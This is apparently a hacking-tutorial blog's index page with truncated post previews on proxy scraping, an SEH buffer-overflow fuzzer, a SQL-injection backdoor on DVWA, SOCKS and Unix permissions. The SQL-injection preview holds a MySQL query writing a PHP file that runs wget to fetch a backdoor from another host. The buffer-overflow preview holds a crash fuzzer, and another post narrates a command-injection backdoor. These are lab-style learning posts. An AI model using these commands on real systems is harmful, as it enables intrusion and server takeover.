Posts

Grabbing Proxy With Selenium and Python

Image
Selenium is automated browser that can be controlled by script. Selenium support for many programming language like Java, csharp, python, ruby, php, perl, and javascript. This simple script for grabbing proxy list from freeproxylist.net website created with python. 1. Install python selenium        # apt-get install python-pip        # pip install selenium 2. Download browser driver     Chrome : https://sites.google.com/a/chromium.org/chromedriver/downloads Edge : https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/ Firefox : https://github.com/mozilla/geckodriver/releases Safari : https://webkit.org/blog/6900/webdriver-support-in-safari-10/ Chose favorite browser you want. 3.  Run this script import os from selenium import webdriver from bs4 import BeautifulSoup from selenium.webdriver.common.keys import Keys chromedriver = "./chromedriver" # replace with your browser driver os.environ["webdriver.chrome.driver"] = chromed

SEH Based Buffer Overflow

Image
This time I will   tell you about   buffer   overflow   that occurs   in the File   Sharing   Wizard  application, this firs time I learn about buffer overflow. we 'll   get a   buffer   overflow   when   we   send  to that aplication  2000   bytes of data, this the sample fuzzer with python  : import socket import sys ips = '192.168.56.101' port = 80 string = "A" * 2000 print "[!] Launching Remote BoF on", ips,",hang on tight!" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: connect=s.connect((ips, port)) except: print "[-] Oops! Cannot establish connection..\r\n" sys.exit(1) print "[*] Sending evil payload..\r\n" print "[*] Done! Check your debugger.." payload = ( 'HEAD %s HTTP/1.0\r\n' '\r\n') % (string) s.send(payload) s.close() whit that fuzzer aplication will crash but EIP not overwrite bicause this aplication protected whit SEH, we can see that with SEH chain menu in debugger : A

Create Backdoor From Sql Injection

Image
To create backdoor from sql injection, the web must be vulnerable with sql injection. then we find the password for mysql database, that can be do with some tecnique, like social enginering or scanning with sqlmap, for exemple : root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="Cookie: security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --password after we got the password, now we enter to mysql with the following sintax: root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p  then press enter and input the password we got. now we on my sql shell, and from here we can create database and create backdoor. this sample sintax to download backdoor from other web : mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --; Query OK, 1 row affected (0.00 sec) now we

sock proxy

SOCKS is an Internet protocol that routes network packets between a client and server through a proxy server. Socks5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server will proxy TCP connections to an arbitrary IP address as well as providing a means for UDP packets to be forwarded. Comparison with HTTP Proxying SOCKS operates at a lower level than HTTP proxying: SOCKS uses a handshake protocol to inform the proxy software about the connection that the client is trying to make and may be used for any form of TCP or UDP socket connection, whereas an HTTP proxy takes an HTTP request and forwards it to an HTTP server. Though HTTP proxying has a different use-case in mind, the CONNECT method allows one to forward TCP connections, there is however no mechanism for UDP proxying.

Server Exploit (local exploit)

This time I will write about the exploit servers , the exploit I do over the web is there in , and the web has vulner . I did the following steps :   First , I did a scan of the web to find out what applications are used , and I get the web using wordpress and xampp server applications , since both use the latest version so I do not get vurner . Second , I find that there are vulner used in gadgets , and I found a gadget for the vulner ping an ip , after my tests I found that I can run a variety of commant therein . Third , I wrote commant that serves to download a backdoor that I had prepared . and my backdoor successful entry into the web. F ourth , after a backdoor embedded it is time to find where the location of the embedded backdoor , it's not hard to do because we can use the vulner commant execution had to look for it . after found it, I open the backdoor. until

Filesystem permissions

Most current file systems have methods of administering permissions or access rights to specific users and groups of users. These systems control the ability of the users affected to view or make changes to the contents of the filesystem. Traditional Unix permissions Permissions on Unix-like systems are managed in three distinct classes . These classes are known as user , group , and others . In effect, Unix permissions are a simplified form of access control lists (ACLs). When a new file is created on a Unix-like system, its permissions are determined from the umask of the process that created it. Classes Files and directories are owned by a user. The owner determines the file's owner class . Distinct permissions apply to the owner. Files and directories are assigned a group, which define the file's group class. Distinct permissions apply to members of the file's group members. The owner doesn't need to be a member of the file's group. Users who are not the

Building and Exploiting System

In this case i learn to built system and